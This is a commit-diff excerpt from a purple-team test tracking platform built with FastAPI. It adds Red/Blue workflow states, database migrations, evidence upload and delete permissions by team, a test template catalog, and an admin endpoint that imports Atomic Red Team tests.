Compare commits

...

2 Commits

Author SHA1 Message Date
kitos 035b51b3d6 feat(phase-12): implement Red/Blue API endpoints (T-109, T-110, T-111, T-112)
T-109: Rewrite tests router with full Red/Blue workflow endpoints - list with filters, create from template, Red/Blue team updates with state guards, start-execution, submit-red, submit-blue, validate-red, validate-blue, reopen, and timeline. All using workflow service from Phase 11.

T-110: Rewrite evidence router with Red/Blue separation - upload with team field, list with team filter, delete with state-based permissions. Red Team edits in draft/red_executing, Blue Team in blue_evaluating, admin bypasses all.

T-111: Create test_templates router with full CRUD - paginated list with source/platform/severity/search filters, by-technique lookup, admin-only create/update, and soft delete. Registered in main.py.

T-112: Add POST /system/import-atomic-tests endpoint to system router - admin-only trigger for Atomic Red Team import with error handling and statistics response.

Includes validation tests for all four tasks (35 checks total).
2026-02-09 10:45:33 +01:00
kitos b64b06f7e9 feat(phase-11): implement Red/Blue business logic services (T-106, T-107, T-108)
T-106: Create test_workflow_service.py with state-machine transitions for the complete test lifecycle (draft -> red_executing -> blue_evaluating -> in_review -> validated/rejected), dual validation by Red/Blue leads, and reopen capability with field cleanup.

T-107: Update status_service.py to use detection_result from Blue Team instead of legacy result field, and differentiate between partial progress (some validated) vs all-in-progress states.

T-108: Create atomic_import_service.py that downloads the Atomic Red Team repo as a ZIP (avoiding API rate limits), parses all atomics YAML files, and creates idempotent TestTemplate records mapped to MITRE techniques.

Includes validation tests for all three tasks (19 checks total).
2026-02-09 09:58:54 +01:00
30 changed files with 3803 additions and 151 deletions
@@ -0,0 +1,32 @@
"""add_new_test_states
Revision ID: b001add0test
Revises: a1412d1ef337
Create Date: 2026-02-09 10:00:00.000000
"""
from typing import Sequence, Union
from alembic import op
# revision identifiers, used by Alembic.
revision: str = 'b001add0test'
down_revision: Union[str, Sequence[str], None] = 'a1412d1ef337'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Add red_executing and blue_evaluating values to the teststate enum."""
op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'red_executing' AFTER 'draft'")
op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'blue_evaluating' AFTER 'red_executing'")
def downgrade() -> None:
"""Downgrade: removing enum values in PostgreSQL requires recreating the type.
This is intentionally left as a no-op because dropping enum values is
destructive and rarely needed in practice.
"""
pass
@@ -0,0 +1,46 @@
"""add_evidence_team_and_notes
Revision ID: b002evidteam
Revises: b001add0test
Create Date: 2026-02-09 10:01:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision: str = 'b002evidteam'
down_revision: Union[str, Sequence[str], None] = 'b001add0test'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create teamside enum and add team/notes columns to evidences."""
# Create the new enum type
teamside_enum = postgresql.ENUM('red', 'blue', name='teamside', create_type=False)
op.execute("CREATE TYPE teamside AS ENUM ('red', 'blue')")
# Add columns
op.add_column('evidences', sa.Column(
'team',
teamside_enum,
nullable=False,
server_default='red',
))
op.add_column('evidences', sa.Column(
'notes',
sa.Text(),
nullable=True,
))
def downgrade() -> None:
"""Remove team/notes columns and drop teamside enum."""
op.drop_column('evidences', 'notes')
op.drop_column('evidences', 'team')
op.execute("DROP TYPE IF EXISTS teamside")
@@ -0,0 +1,87 @@
"""add_dual_validation_fields_to_tests
Revision ID: b003dualvalid
Revises: b002evidteam
Create Date: 2026-02-09 10:02:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision: str = 'b003dualvalid'
down_revision: Union[str, Sequence[str], None] = 'b002evidteam'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Drop legacy validated_by/validated_at and add dual validation columns."""
# Drop legacy single-validation columns
op.drop_constraint('tests_validated_by_fkey', 'tests', type_='foreignkey')
op.drop_column('tests', 'validated_by')
op.drop_column('tests', 'validated_at')
# ── Red Team fields ─────────────────────────────────────────
op.add_column('tests', sa.Column('red_summary', sa.Text(), nullable=True))
op.add_column('tests', sa.Column('attack_success', sa.Boolean(), nullable=True))
op.add_column('tests', sa.Column('red_validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('red_validated_at', sa.DateTime(), nullable=True))
op.add_column('tests', sa.Column('red_validation_status', sa.String(), nullable=True))
op.add_column('tests', sa.Column('red_validation_notes', sa.Text(), nullable=True))
# ── Blue Team fields ────────────────────────────────────────
op.add_column('tests', sa.Column('blue_summary', sa.Text(), nullable=True))
op.add_column('tests', sa.Column(
'detection_result',
postgresql.ENUM('detected', 'not_detected', 'partially_detected',
name='testresult', create_type=False),
nullable=True,
))
op.add_column('tests', sa.Column('blue_validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('blue_validated_at', sa.DateTime(), nullable=True))
op.add_column('tests', sa.Column('blue_validation_status', sa.String(), nullable=True))
op.add_column('tests', sa.Column('blue_validation_notes', sa.Text(), nullable=True))
# ── Foreign keys ────────────────────────────────────────────
op.create_foreign_key(
'fk_tests_red_validated_by', 'tests', 'users',
['red_validated_by'], ['id'],
)
op.create_foreign_key(
'fk_tests_blue_validated_by', 'tests', 'users',
['blue_validated_by'], ['id'],
)
def downgrade() -> None:
"""Reverse: drop dual validation columns and restore legacy columns."""
# Drop FKs
op.drop_constraint('fk_tests_blue_validated_by', 'tests', type_='foreignkey')
op.drop_constraint('fk_tests_red_validated_by', 'tests', type_='foreignkey')
# Drop new columns
op.drop_column('tests', 'blue_validation_notes')
op.drop_column('tests', 'blue_validation_status')
op.drop_column('tests', 'blue_validated_at')
op.drop_column('tests', 'blue_validated_by')
op.drop_column('tests', 'detection_result')
op.drop_column('tests', 'blue_summary')
op.drop_column('tests', 'red_validation_notes')
op.drop_column('tests', 'red_validation_status')
op.drop_column('tests', 'red_validated_at')
op.drop_column('tests', 'red_validated_by')
op.drop_column('tests', 'attack_success')
op.drop_column('tests', 'red_summary')
# Restore legacy columns
op.add_column('tests', sa.Column('validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('validated_at', sa.DateTime(), nullable=True))
op.create_foreign_key(
'tests_validated_by_fkey', 'tests', 'users',
['validated_by'], ['id'],
)
@@ -0,0 +1,54 @@
"""add_test_templates_table
Revision ID: b004templates
Revises: b003dualvalid
Create Date: 2026-02-09 10:03:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision: str = 'b004templates'
down_revision: Union[str, Sequence[str], None] = 'b003dualvalid'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create the test_templates table with indexes."""
op.create_table(
'test_templates',
sa.Column('id', sa.UUID(), nullable=False, default=sa.text('gen_random_uuid()')),
sa.Column('mitre_technique_id', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('source', sa.String(), nullable=False),
sa.Column('source_url', sa.String(), nullable=True),
sa.Column('attack_procedure', sa.Text(), nullable=True),
sa.Column('expected_detection', sa.Text(), nullable=True),
sa.Column('platform', sa.String(), nullable=True),
sa.Column('tool_suggested', sa.String(), nullable=True),
sa.Column('severity', sa.String(), nullable=True),
sa.Column('atomic_test_id', sa.String(), nullable=True),
sa.Column('is_active', sa.Boolean(), nullable=True, server_default=sa.text('true')),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_index('ix_test_templates_mitre_technique_id', 'test_templates', ['mitre_technique_id'])
op.create_index('ix_test_templates_source', 'test_templates', ['source'])
op.create_index('ix_test_templates_platform', 'test_templates', ['platform'])
op.create_index('ix_test_templates_severity', 'test_templates', ['severity'])
def downgrade() -> None:
"""Drop the test_templates table and its indexes."""
op.drop_index('ix_test_templates_severity', table_name='test_templates')
op.drop_index('ix_test_templates_platform', table_name='test_templates')
op.drop_index('ix_test_templates_source', table_name='test_templates')
op.drop_index('ix_test_templates_mitre_technique_id', table_name='test_templates')
op.drop_table('test_templates')
@@ -0,0 +1,55 @@
"""add_v2_indexes
Revision ID: b005v2indexes
Revises: b004templates
Create Date: 2026-02-09 10:04:00.000000
"""
from typing import Sequence, Union
from alembic import op
# revision identifiers, used by Alembic.
revision: str = 'b005v2indexes'
down_revision: Union[str, Sequence[str], None] = 'b004templates'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create performance indexes for V2 queries."""
# ── Tests ───────────────────────────────────────────────────
op.create_index('ix_tests_state', 'tests', ['state'])
op.create_index('ix_tests_technique_id', 'tests', ['technique_id'])
op.create_index('ix_tests_created_by', 'tests', ['created_by'])
op.create_index('ix_tests_red_validation_status', 'tests', ['red_validation_status'])
op.create_index('ix_tests_blue_validation_status', 'tests', ['blue_validation_status'])
# ── Evidences ───────────────────────────────────────────────
op.create_index('ix_evidences_test_id', 'evidences', ['test_id'])
op.create_index('ix_evidences_team', 'evidences', ['team'])
# ── Techniques (if not already present from MVP) ────────────
op.create_index('ix_techniques_tactic', 'techniques', ['tactic'])
op.create_index('ix_techniques_status_global', 'techniques', ['status_global'])
op.create_index('ix_techniques_review_required', 'techniques', ['review_required'])
def downgrade() -> None:
"""Drop all V2 indexes."""
# Techniques
op.drop_index('ix_techniques_review_required', table_name='techniques')
op.drop_index('ix_techniques_status_global', table_name='techniques')
op.drop_index('ix_techniques_tactic', table_name='techniques')
# Evidences
op.drop_index('ix_evidences_team', table_name='evidences')
op.drop_index('ix_evidences_test_id', table_name='evidences')
# Tests
op.drop_index('ix_tests_blue_validation_status', table_name='tests')
op.drop_index('ix_tests_red_validation_status', table_name='tests')
op.drop_index('ix_tests_created_by', table_name='tests')
op.drop_index('ix_tests_technique_id', table_name='tests')
op.drop_index('ix_tests_state', table_name='tests')
+2
View File
@@ -11,6 +11,7 @@ from app.routers import auth as auth_router
from app.routers import techniques as techniques_router from app.routers import techniques as techniques_router
from app.routers import tests as tests_router from app.routers import tests as tests_router
from app.routers import evidence as evidence_router from app.routers import evidence as evidence_router
from app.routers import test_templates as test_templates_router
from app.routers import system as system_router from app.routers import system as system_router
from app.routers import metrics as metrics_router from app.routers import metrics as metrics_router
from app.routers import users as users_router from app.routers import users as users_router
@@ -50,6 +51,7 @@ app.include_router(auth_router.router, prefix="/api/v1")
app.include_router(techniques_router.router, prefix="/api/v1") app.include_router(techniques_router.router, prefix="/api/v1")
app.include_router(tests_router.router, prefix="/api/v1") app.include_router(tests_router.router, prefix="/api/v1")
app.include_router(evidence_router.router, prefix="/api/v1") app.include_router(evidence_router.router, prefix="/api/v1")
app.include_router(test_templates_router.router, prefix="/api/v1")
app.include_router(system_router.router, prefix="/api/v1") app.include_router(system_router.router, prefix="/api/v1")
app.include_router(metrics_router.router, prefix="/api/v1") app.include_router(metrics_router.router, prefix="/api/v1")
app.include_router(users_router.router, prefix="/api/v1") app.include_router(users_router.router, prefix="/api/v1")
+5 -3
View File
@@ -2,12 +2,14 @@
from app.models.user import User from app.models.user import User
from app.models.technique import Technique from app.models.technique import Technique
from app.models.test import Test from app.models.test import Test
from app.models.test_template import TestTemplate
from app.models.evidence import Evidence from app.models.evidence import Evidence
from app.models.intel import IntelItem from app.models.intel import IntelItem
from app.models.audit import AuditLog from app.models.audit import AuditLog
from app.models.enums import TechniqueStatus, TestState, TestResult from app.models.enums import TechniqueStatus, TestState, TestResult, TeamSide
__all__ = [ __all__ = [
"User", "Technique", "Test", "Evidence", "IntelItem", "AuditLog", "User", "Technique", "Test", "TestTemplate", "Evidence",
"TechniqueStatus", "TestState", "TestResult" "IntelItem", "AuditLog",
"TechniqueStatus", "TestState", "TestResult", "TeamSide",
] ]
+7
View File
@@ -12,11 +12,18 @@ class TechniqueStatus(str, enum.Enum):
class TestState(str, enum.Enum): class TestState(str, enum.Enum):
draft = "draft" draft = "draft"
red_executing = "red_executing" # Red Team documenting attack
blue_evaluating = "blue_evaluating" # Blue Team evaluating detection
in_review = "in_review" in_review = "in_review"
validated = "validated" validated = "validated"
rejected = "rejected" rejected = "rejected"
class TeamSide(str, enum.Enum):
red = "red"
blue = "blue"
class TestResult(str, enum.Enum): class TestResult(str, enum.Enum):
detected = "detected" detected = "detected"
not_detected = "not_detected" not_detected = "not_detected"
+7 -1
View File
@@ -1,11 +1,12 @@
import uuid import uuid
from datetime import datetime from datetime import datetime
from sqlalchemy import Column, String, DateTime, ForeignKey from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum
from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship from sqlalchemy.orm import relationship
from app.database import Base from app.database import Base
from app.models.enums import TeamSide
class Evidence(Base): class Evidence(Base):
@@ -14,6 +15,9 @@ class Evidence(Base):
Files are stored in MinIO, and this model tracks the file location, Files are stored in MinIO, and this model tracks the file location,
integrity hash, and upload metadata. integrity hash, and upload metadata.
The ``team`` field distinguishes whether this evidence was uploaded by
Red Team (attack evidence) or Blue Team (detection evidence).
""" """
__tablename__ = "evidences" __tablename__ = "evidences"
@@ -24,6 +28,8 @@ class Evidence(Base):
sha256_hash = Column(String, nullable=False) sha256_hash = Column(String, nullable=False)
uploaded_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) uploaded_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
uploaded_at = Column(DateTime, default=datetime.utcnow) uploaded_at = Column(DateTime, default=datetime.utcnow)
team = Column(Enum(TeamSide, name="teamside"), nullable=False, default=TeamSide.red)
notes = Column(Text, nullable=True)
# Relationships # Relationships
test = relationship("Test", back_populates="evidences") test = relationship("Test", back_populates="evidences")
+24 -7
View File
@@ -1,7 +1,7 @@
import uuid import uuid
from datetime import datetime from datetime import datetime
from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum from sqlalchemy import Column, String, Text, Boolean, DateTime, ForeignKey, Enum
from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship from sqlalchemy.orm import relationship
@@ -12,12 +12,14 @@ from app.models.enums import TestState, TestResult
class Test(Base): class Test(Base):
""" """
Test model representing a security test for a MITRE ATT&CK technique. Test model representing a security test for a MITRE ATT&CK technique.
Each test documents an attempt to validate coverage of a specific technique, Each test documents an attempt to validate coverage of a specific technique,
including the procedure, tools used, and outcome. including the procedure, tools used, and outcome. V2 introduces dual
validation: Red Lead and Blue Lead must each approve independently.
""" """
__tablename__ = "tests" __tablename__ = "tests"
# ── Core fields ─────────────────────────────────────────────────
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
technique_id = Column(UUID(as_uuid=True), ForeignKey("techniques.id"), nullable=False) technique_id = Column(UUID(as_uuid=True), ForeignKey("techniques.id"), nullable=False)
name = Column(String, nullable=False) name = Column(String, nullable=False)
@@ -29,12 +31,27 @@ class Test(Base):
created_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) created_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
result = Column(Enum(TestResult, name="testresult"), nullable=True) result = Column(Enum(TestResult, name="testresult"), nullable=True)
state = Column(Enum(TestState, name="teststate"), default=TestState.draft) state = Column(Enum(TestState, name="teststate"), default=TestState.draft)
validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
validated_at = Column(DateTime, nullable=True)
created_at = Column(DateTime, default=datetime.utcnow) created_at = Column(DateTime, default=datetime.utcnow)
# Relationships # ── Red Team fields ─────────────────────────────────────────────
red_summary = Column(Text, nullable=True)
attack_success = Column(Boolean, nullable=True)
red_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
red_validated_at = Column(DateTime, nullable=True)
red_validation_status = Column(String, nullable=True) # pending / approved / rejected
red_validation_notes = Column(Text, nullable=True)
# ── Blue Team fields ────────────────────────────────────────────
blue_summary = Column(Text, nullable=True)
detection_result = Column(Enum(TestResult, name="testresult"), nullable=True)
blue_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
blue_validated_at = Column(DateTime, nullable=True)
blue_validation_status = Column(String, nullable=True) # pending / approved / rejected
blue_validation_notes = Column(Text, nullable=True)
# ── Relationships ───────────────────────────────────────────────
technique = relationship("Technique", back_populates="tests") technique = relationship("Technique", back_populates="tests")
evidences = relationship("Evidence", back_populates="test") evidences = relationship("Evidence", back_populates="test")
creator = relationship("User", foreign_keys=[created_by]) creator = relationship("User", foreign_keys=[created_by])
validator = relationship("User", foreign_keys=[validated_by]) red_validator = relationship("User", foreign_keys=[red_validated_by])
blue_validator = relationship("User", foreign_keys=[blue_validated_by])
+45
View File
@@ -0,0 +1,45 @@
"""TestTemplate model — predefined test catalog entries."""
import uuid
from datetime import datetime
from sqlalchemy import Column, String, Text, Boolean, DateTime, Index
from sqlalchemy.dialects.postgresql import UUID
from app.database import Base
class TestTemplate(Base):
"""
Predefined test template mapped to a MITRE ATT&CK technique.
Templates come from several sources:
- **atomic_red_team**: Atomic Red Team by Red Canary
- **mitre**: MITRE ATT&CK procedure examples
- **custom**: Manually created by teams
Users can instantiate a real Test from a template.
"""
__tablename__ = "test_templates"
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
mitre_technique_id = Column(String, nullable=False) # e.g. "T1059.001"
name = Column(String, nullable=False)
description = Column(Text, nullable=True)
source = Column(String, nullable=False) # atomic_red_team / mitre / custom
source_url = Column(String, nullable=True)
attack_procedure = Column(Text, nullable=True) # Suggested attack procedure
expected_detection = Column(Text, nullable=True) # What blue team should detect
platform = Column(String, nullable=True) # windows / linux / macos
tool_suggested = Column(String, nullable=True)
severity = Column(String, nullable=True) # low / medium / high / critical
atomic_test_id = Column(String, nullable=True) # ID in Atomic Red Team repo
is_active = Column(Boolean, default=True)
created_at = Column(DateTime, default=datetime.utcnow)
__table_args__ = (
Index('ix_test_templates_mitre_technique_id', 'mitre_technique_id'),
Index('ix_test_templates_source', 'source'),
Index('ix_test_templates_platform', 'platform'),
Index('ix_test_templates_severity', 'severity'),
)
+216 -22
View File
@@ -1,13 +1,34 @@
"""Evidence upload and download router.""" """Evidence upload, download, listing and deletion router — v2 with Red/Blue separation.
Endpoints
---------
POST /tests/{test_id}/evidence — upload evidence (with team=red/blue)
GET /tests/{test_id}/evidence — list evidences (filterable by team)
GET /evidence/{id} — presigned download URL
DELETE /evidence/{id} — delete evidence (only in editable states)
Access Control
--------------
- Red Team (``red_tech``) can only upload ``team=red`` when test is in
``draft`` or ``red_executing``.
- Blue Team (``blue_tech``) can only upload ``team=blue`` when test is in
``blue_evaluating``.
- Admin can upload any team in any state.
- DELETE is restricted: red evidence in ``draft``/``red_executing``,
blue evidence in ``blue_evaluating``. No deletions in ``in_review``,
``validated``, or ``rejected``.
"""
import hashlib import hashlib
import uuid as _uuid import uuid as _uuid
from typing import Optional
from fastapi import APIRouter, Depends, File, HTTPException, UploadFile, status from fastapi import APIRouter, Depends, File, Form, HTTPException, Query, UploadFile, status
from sqlalchemy.orm import Session from sqlalchemy.orm import Session
from app.database import get_db from app.database import get_db
from app.dependencies.auth import get_current_user from app.dependencies.auth import get_current_user
from app.models.enums import TeamSide, TestState
from app.models.evidence import Evidence from app.models.evidence import Evidence
from app.models.test import Test from app.models.test import Test
from app.models.user import User from app.models.user import User
@@ -17,9 +38,114 @@ from app.storage import get_presigned_url, upload_file
router = APIRouter(tags=["evidence"]) router = APIRouter(tags=["evidence"])
# States where red evidence can be uploaded / deleted
_RED_EDITABLE_STATES = (TestState.draft, TestState.red_executing)
# States where blue evidence can be uploaded / deleted
_BLUE_EDITABLE_STATES = (TestState.blue_evaluating,)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# POST /tests/{test_id}/evidence — upload # Helpers
# ---------------------------------------------------------------------------
def _evidence_to_out(evidence: Evidence) -> EvidenceOut:
"""Convert an ORM ``Evidence`` to the API schema, injecting a presigned URL."""
return EvidenceOut(
id=evidence.id,
test_id=evidence.test_id,
file_name=evidence.file_name,
sha256_hash=evidence.sha256_hash,
uploaded_by=evidence.uploaded_by,
uploaded_at=evidence.uploaded_at,
team=evidence.team,
notes=evidence.notes,
download_url=get_presigned_url(evidence.file_path),
)
def _validate_upload_permission(
test: Test,
team: TeamSide,
user: User,
) -> None:
"""Raise 403 if the user/team combination is not allowed in the current state."""
# Admins bypass all checks
if user.role == "admin":
return
if team == TeamSide.red:
# Only red_tech can upload red evidence
if user.role != "red_tech":
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Only red_tech or admin can upload red evidence",
)
if test.state not in _RED_EDITABLE_STATES:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot upload red evidence in '{test.state.value}' state "
f"(allowed in: draft, red_executing)",
)
elif team == TeamSide.blue:
# Only blue_tech can upload blue evidence
if user.role != "blue_tech":
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Only blue_tech or admin can upload blue evidence",
)
if test.state not in _BLUE_EDITABLE_STATES:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot upload blue evidence in '{test.state.value}' state "
f"(allowed in: blue_evaluating)",
)
def _validate_delete_permission(
test: Test,
evidence: Evidence,
user: User,
) -> None:
"""Raise 403 if the user cannot delete this evidence in the current state."""
# No deletions in review / validated / rejected
if test.state in (TestState.in_review, TestState.validated, TestState.rejected):
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail=f"Cannot delete evidence when test is in '{test.state.value}' state",
)
# Admin can delete in editable states
if user.role == "admin":
return
ev_team = evidence.team
if ev_team == TeamSide.red:
if test.state not in _RED_EDITABLE_STATES:
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Cannot delete red evidence outside draft/red_executing",
)
if user.role != "red_tech" and evidence.uploaded_by != user.id:
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Not enough permissions to delete this evidence",
)
elif ev_team == TeamSide.blue:
if test.state not in _BLUE_EDITABLE_STATES:
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Cannot delete blue evidence outside blue_evaluating",
)
if user.role != "blue_tech" and evidence.uploaded_by != user.id:
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Not enough permissions to delete this evidence",
)
# ---------------------------------------------------------------------------
# POST /tests/{test_id}/evidence — upload with team
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -31,19 +157,16 @@ router = APIRouter(tags=["evidence"])
async def upload_evidence( async def upload_evidence(
test_id: _uuid.UUID, test_id: _uuid.UUID,
file: UploadFile = File(...), file: UploadFile = File(...),
team: TeamSide = Form(TeamSide.red),
notes: Optional[str] = Form(None),
db: Session = Depends(get_db), db: Session = Depends(get_db),
current_user: User = Depends(get_current_user), current_user: User = Depends(get_current_user),
): ):
"""Upload a file as evidence for the given test. """Upload a file as evidence for the given test.
Steps: The ``team`` field (sent as form data) determines whether this is
1. Read file content and compute SHA-256. Red Team (attack) or Blue Team (detection) evidence.
2. Build an object key ``{test_id}/{uuid}_{filename}``.
3. Upload to MinIO.
4. Persist an :class:`Evidence` row in the database.
5. Write an audit-log entry.
""" """
# Verify the parent test exists
test = db.query(Test).filter(Test.id == test_id).first() test = db.query(Test).filter(Test.id == test_id).first()
if test is None: if test is None:
raise HTTPException( raise HTTPException(
@@ -51,6 +174,9 @@ async def upload_evidence(
detail="Test not found", detail="Test not found",
) )
# Validate permissions
_validate_upload_permission(test, team, current_user)
# 1. Read content + hash # 1. Read content + hash
content = await file.read() content = await file.read()
sha256 = hashlib.sha256(content).hexdigest() sha256 = hashlib.sha256(content).hexdigest()
@@ -69,6 +195,8 @@ async def upload_evidence(
file_path=key, file_path=key,
sha256_hash=sha256, sha256_hash=sha256,
uploaded_by=current_user.id, uploaded_by=current_user.id,
team=team,
notes=notes,
) )
db.add(evidence) db.add(evidence)
db.commit() db.commit()
@@ -85,13 +213,42 @@ async def upload_evidence(
"file_name": file_name, "file_name": file_name,
"sha256": sha256, "sha256": sha256,
"test_id": str(test_id), "test_id": str(test_id),
"team": team.value,
}, },
) )
# Build response with download URL
return _evidence_to_out(evidence) return _evidence_to_out(evidence)
# ---------------------------------------------------------------------------
# GET /tests/{test_id}/evidence — list (with optional team filter)
# ---------------------------------------------------------------------------
@router.get("/tests/{test_id}/evidence", response_model=list[EvidenceOut])
def list_evidence(
test_id: _uuid.UUID,
team: Optional[str] = Query(None, description="Filter by team: red or blue"),
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""List all evidences for a test, optionally filtered by team."""
test = db.query(Test).filter(Test.id == test_id).first()
if test is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test not found",
)
query = db.query(Evidence).filter(Evidence.test_id == test_id)
if team:
query = query.filter(Evidence.team == team)
evidences = query.order_by(Evidence.uploaded_at.desc()).all()
return [_evidence_to_out(e) for e in evidences]
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# GET /evidence/{id} — presigned download URL # GET /evidence/{id} — presigned download URL
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -115,18 +272,55 @@ def get_evidence(
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# Internal helpers # DELETE /evidence/{id} — delete evidence (editable states only)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
def _evidence_to_out(evidence: Evidence) -> EvidenceOut: @router.delete("/evidence/{evidence_id}", status_code=status.HTTP_200_OK)
"""Convert an ORM ``Evidence`` to the API schema, injecting a presigned URL.""" def delete_evidence(
return EvidenceOut( evidence_id: _uuid.UUID,
id=evidence.id, db: Session = Depends(get_db),
test_id=evidence.test_id, current_user: User = Depends(get_current_user),
file_name=evidence.file_name, ):
sha256_hash=evidence.sha256_hash, """Delete an evidence record.
uploaded_by=evidence.uploaded_by,
uploaded_at=evidence.uploaded_at, Only allowed in editable states:
download_url=get_presigned_url(evidence.file_path), - Red evidence: ``draft``, ``red_executing``
- Blue evidence: ``blue_evaluating``
- No deletions in ``in_review``, ``validated``, ``rejected``
"""
evidence = db.query(Evidence).filter(Evidence.id == evidence_id).first()
if evidence is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Evidence not found",
)
test = db.query(Test).filter(Test.id == evidence.test_id).first()
if test is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Parent test not found",
)
# Permission checks
_validate_delete_permission(test, evidence, current_user)
# Audit before deletion
log_action(
db,
user_id=current_user.id,
action="delete_evidence",
entity_type="evidence",
entity_id=evidence.id,
details={
"file_name": evidence.file_name,
"test_id": str(evidence.test_id),
"team": evidence.team.value if evidence.team else None,
},
) )
db.delete(evidence)
db.commit()
return {"detail": "Evidence deleted"}
+39 -1
View File
@@ -1,9 +1,12 @@
"""System-level endpoints (admin only). """System-level endpoints (admin only).
Provides manual triggers for background operations such as the MITRE Provides manual triggers for background operations such as the MITRE
ATT&CK synchronisation, intel scanning, and scheduler health introspection. ATT&CK synchronisation, intel scanning, Atomic Red Team import, and
scheduler health introspection.
""" """
import logging
from fastapi import APIRouter, Depends from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session from sqlalchemy.orm import Session
@@ -12,8 +15,11 @@ from app.dependencies.auth import require_role
from app.models.user import User from app.models.user import User
from app.services.mitre_sync_service import sync_mitre from app.services.mitre_sync_service import sync_mitre
from app.services.intel_service import scan_intel from app.services.intel_service import scan_intel
from app.services.atomic_import_service import import_atomic_red_team
from app.jobs.mitre_sync_job import scheduler from app.jobs.mitre_sync_job import scheduler
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/system", tags=["system"]) router = APIRouter(prefix="/system", tags=["system"])
@@ -56,6 +62,38 @@ def trigger_intel_scan(
} }
@router.post("/import-atomic-tests")
def trigger_atomic_import(
db: Session = Depends(get_db),
current_user: User = Depends(require_role("admin")),
):
"""Trigger an import of Atomic Red Team tests as TestTemplates.
**Requires** the ``admin`` role.
Downloads the Atomic Red Team repository ZIP from GitHub, parses the
YAML files, and creates/updates TestTemplate records. Running this
endpoint multiple times is idempotent — duplicates are skipped.
Returns a JSON object with import statistics.
"""
try:
summary = import_atomic_red_team(db)
except Exception as exc:
logger.error("Atomic Red Team import failed: %s", exc)
return {
"message": "Import failed",
"error": str(exc),
}
return {
"message": "Import completed",
"imported": summary["created"],
"skipped": summary["skipped_existing"],
"total_parsed": summary["total_tests_parsed"],
}
@router.get("/scheduler-status") @router.get("/scheduler-status")
def scheduler_status( def scheduler_status(
current_user: User = Depends(require_role("admin")), current_user: User = Depends(require_role("admin")),
+242
View File
@@ -0,0 +1,242 @@
"""CRUD router for TestTemplates — predefined test catalog.
Endpoints
---------
GET /test-templates — list with filters + pagination
GET /test-templates/{id} — detail
POST /test-templates — create custom (admin)
PATCH /test-templates/{id} — update (admin)
DELETE /test-templates/{id} — soft delete (admin)
GET /test-templates/by-technique/{mitre_id} — templates for a MITRE technique
Filters (GET /test-templates)
-----------------------------
- source: atomic_red_team | mitre | custom
- platform: windows | linux | macos
- severity: low | medium | high | critical
- mitre_technique_id: filter by specific technique
- search: full-text search across name and description
- offset / limit: pagination (default limit=50)
"""
import uuid
from typing import Optional
from fastapi import APIRouter, Depends, HTTPException, Query, status
from sqlalchemy import or_
from sqlalchemy.orm import Session
from app.database import get_db
from app.dependencies.auth import get_current_user, require_role
